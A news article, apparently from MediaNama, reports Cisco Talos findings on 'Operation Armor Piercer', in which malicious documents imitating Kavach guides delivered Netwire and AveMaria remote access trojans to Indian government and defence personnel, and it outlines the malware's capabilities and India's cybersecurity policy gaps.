Malicious documents containing remote access trojans (RAT) were allegedly distributed to several Indian government and defence agency personnel to access confidential information, claimed Cisco Talos in a report.
The hacking operation termed “Armor Piercer” uses two RATs — Netwire RAT and WarzoneRAT (alias Ave Maria), and it was first observed in December 2020. The Cisco Talos report said that the RATs masqueraded as documents related to the Indian government’s Kavach Application.
What is Kavach? Kavach is a two-factor authentication application used by government employees to access their emails. There are multiple how-to-use Kavach documents available on the internet, issued by the Indian government. The malicious documents were modelled after these documents.
Operation Armor Piercer is a grim reminder of the vulnerabilities still existing in our cybersecurity posture. To ensure end-to-end security of India’s assets and information, government and defence agencies must implement a layered defence strategy that enables visibility and coverage across all endpoints. — Vishak Raman, Director, Security Business, Cisco India
MediaNama has reached out to the Indian Computer Emergency Response Team with queries pertaining to the alleged attack. The post will be updated when we receive a response.
Operation Armor Piercer is another instance of highly motivated threat actors using a set of RAT families to infect their victims. These RATs are packed with many out-of-the-box features to gain complete control over the infected systems. The use of RATs makes it challenging to track down the threat actors behind them.
What do these malware documents contain?
The maldocs pose as documents related to either meeting schedules pertinent to the victims, or as technical guides related to the Government of India’s IT infrastructure. It is likely that these files are either delivered as attachments or links in spear-phishing emails where the verbiage is meant to social engineer the victims into opening the maldoc attachments or downloading them from an attacker-controlled link — Cisco Talos report
These are some of the file names used:
- Online meeting schedule for OPS.doc
In other cases, Cisco Talos found that these maldocs were fashioned after security advisories, meeting schedules, and software installation files.
How does it work?
- When someone clicks on these documents, it will activate a payload.
- The payload will download the malware from a remote location. “Throughout March and April 2021, the attackers utilized downloaders to download and execute the RAT payloads from remote locations,” the report said.
- After that, the malware infects the system.
The Netwire and AveMaria RAT families are eventually downloaded and executed on the victim machine. In some cases, we’ve also discovered the deployment of custom .NET-based file enumerator modules that generate and exfiltrate file path listings of specific file extensions on the infected systems – Cisco Talos report
What can the malware do?
This is what NetwireRAT (one of the two RATs that were identified by Cisco) can do —
- Steal credentials from browsers
- Execute arbitrary commands
- Gather system information
- Conduct file management operations such as write, read, copy, delete files, etc
- Enumerate, terminate processes
AveMaria RAT can do a whole lot more, such as —
- Enable attacker to log in to the remote machine without anyone knowing
- Control computers remotely at 60 FPS using mouse and keyboard
- Give attacker admin access with just one click
- Recover passwords from popular browsers and email clients in seconds. These browsers include — Chrome, Firefox, Internet Explorer, Edge, Epic, UC, QQ, Opera, Blisk, SRWare, Dragon, Torch, Slimjet, Cent, Outlook, Thunderbird, and Foxmail.
- Enable automatic password recovery to receive passwords without touching any buttons
- Upload and download files at high speed
- Browse the Internet with the remote computer’s IP address
- If the remote computer has a webcam connected, the attacker can view the stream live. The attacker can also view the keys pressed on the remote computer in real time.
What is India’s cybersecurity strategy?
There has been a recent spurt in cyber attacks in India, including alleged attacks perpetrated by Chinese state actors. As of today, India still does not have a data protection law and the National Cyber Security Strategy which has been in the pipeline since 2019, has still not been finalised.
- 2021 is going to be the year of ransomware: National Cybersecurity Coordinator Lt Gen (Dr) Rajesh Pant – #NAMA
- 416 crores allocated this year to strengthen nation’s cybersecurity, here are some measures taken so far: IT Ministry
- India’s New Defence Cyber Agency – Nidhi Singh, CCG-NLUD
- India’s New Defence Cyber Agency—II: Balancing Constitutional Constraints And Covert Ops?
- ‘National Cyber Security Strategy Will Have Framework For Cyber Insurance’: Rajesh Pant
Have something to add? Post your comment and gift someone a MediaNama subscription.